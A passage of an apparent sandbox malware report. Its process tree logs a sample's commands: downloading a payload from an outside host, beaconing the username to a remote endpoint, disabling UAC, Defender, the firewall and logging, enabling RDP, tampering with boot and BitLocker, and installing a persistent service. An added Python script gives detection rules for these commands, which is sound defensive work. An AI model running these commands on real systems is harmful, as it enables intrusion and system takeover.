      - Suspicious use of SendNotifyMessage
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f4718
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5204 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,18213486474361391369,15284824020573970553,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=fzbxdxua\admin2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"3⤵
-
C:\Windows\system32\find.exefind "BackupProductKeyDefault"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.perfect.wuaze.com/guardar_ip.php?id=2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd31f46f8,0x7fffd31f4708,0x7fffd31f47183⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'Bon.zip' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 300 /nobreak2⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "FZBXDXUA$"2⤵
-
C:\Windows\system32\net.exenet user "FZBXDXUA$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
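The tree above is a sequence of one-shot living-off-the-land commands, which is exactly the shape a command-line detection rule catches. As an added example (the editor's own code, not part of the sandbox report or of the sample), the Python below replays a handful of those command lines as constructed process events and classifies each with a small regex rule set; the rule labels, the ATT&CK technique mapping, the "malicious" threshold and every PID except 6072 (the PowerShell PID the report gives) are the editor's assumptions, and the two quiet lines at the end show the rules ignore the benign-looking `reg query` and the `/grant` ACL change.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# (label, ATT&CK technique, regex over the lower-cased command line).
# Labels and regexes are the editor's own, written against the command
# lines in the report above; they are illustrative, not a vendor rule set.
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("uac_disabled", "T1548.002",
     re.compile(r'reg\s+add\s+.*policies\\system.*\benablelua\b.*/d\s+0\b')),
    ("defender_disabled", "T1562.001",
     re.compile(r'reg\s+add\s+.*windows defender.*disableantispyware.*/d\s+1\b')),
    ("firewall_disabled", "T1562.004",
     re.compile(r'netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off')),
    ("rdp_enabled", "T1021.001",
     re.compile(r'fdenytsconnections.*/d\s+0\b|group="remote desktop" new enable=yes|localport=3389\b')),
    ("user_lockout", "T1562.001",
     re.compile(r'\b(disabletaskmgr|disableregistrytools|disablecmd|nocontrolpanel|noexplorer)\b.*/d\s+[12]\b')),
    ("powershell_logging_off", "T1562.002",
     re.compile(r'powershell.*scriptblocklogging.*/d\s+0\b')),
    ("safeboot_tampered", "T1490",
     re.compile(r'reg\s+add\s+.*\\safeboot\\minimal')),
    ("boot_recovery_tampered", "T1490",
     re.compile(r'bcdedit\s+/set\s+\{default\}\s+(recoveryenabled|bootstatuspolicy)')),
    ("service_from_script", "T1543.003",
     re.compile(r'sc\s+create\s+\S+\s+binpath=\s*"[^"]+\.(bat|cmd|vbs|ps1)".*obj=\s*"localsystem"')),
    ("system_binary_acl_denied", "T1222.001",
     re.compile(r'icacls\s+"c:\\windows\\system32\\[^"]+"\s+/deny\s+everyone')),
    ("download_cradle", "T1105",
     re.compile(r'downloadfile\(|invoke-webrequest|start-bitstransfer|certutil.*-urlcache')),
    ("browser_beacon", "T1071.001",
     re.compile(r'msedge\.exe".*--single-argument\s+https?://\S*\?id=')),
]

# Constructed input: PIDs other than 6072 are made up; the command lines
# are copied from the process tree in the report.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (6072, "powershell -Command \"(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')\""),
    (7001, r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f'),
    (7002, r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    (7003, r'netsh advfirewall set allprofiles state off'),
    (7004, r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    (7005, r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    (7006, r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f'),
    (7007, r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f'),
    (7008, r'bcdedit /set {default} bootstatuspolicy IgnoreAllFailures'),
    (7009, r'sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"'),
    (7010, r'icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)'),
    (7011, r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin'),
    # Benign-looking lines from the same tree; no rule should fire on them.
    (7012, r'reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"'),
    (7013, r'icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F'),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    label: str
    technique: str
    command: str


def classify(command: str) -> List[Tuple[str, str]]:
    """Return (label, technique) for every rule matching one command line."""
    text = command.lower()
    return [(label, tech) for label, tech, rx in RULES if rx.search(text)]


def scan(events: Iterable[Tuple[int, str]]) -> List[Finding]:
    """Run every rule over every (pid, command line) event."""
    return [Finding(pid, label, tech, cmd)
            for pid, cmd in events
            for label, tech in classify(cmd)]


def summarize(findings: List[Finding]) -> Tuple[str, List[str], List[str]]:
    """Verdict from the number of distinct tampering behaviours seen.
    The threshold of three is an assumption chosen for this example."""
    labels = sorted({f.label for f in findings})
    techniques = sorted({f.technique for f in findings})
    if len(labels) >= 3:
        verdict = "malicious"
    elif labels:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, labels, techniques


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"pid={f.pid} {f.label:<26} {f.technique:<10} {f.command[:70]}")
    verdict, labels, techniques = summarize(results)
    print(verdict, len(labels), "behaviours", techniques)
```

Each rule is deliberately anchored on the value being written (`/d 0` for EnableLUA, `/d 1` for DisableAntiSpyware) rather than on the key alone, so an administrator restoring defaults does not trip it; the `sc create` rule fires only when a script file runs as LocalSystem, which is what makes the `MiServicio` line notable.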
MITRE ATT&CK Matrix (ATT&CK v13; the number in parentheses is the count the report shows beside each entry)

Execution
- System Services (1)
  - Service Execution (1)
- Command and Scripting Interpreter (2)
  - PowerShell (1)

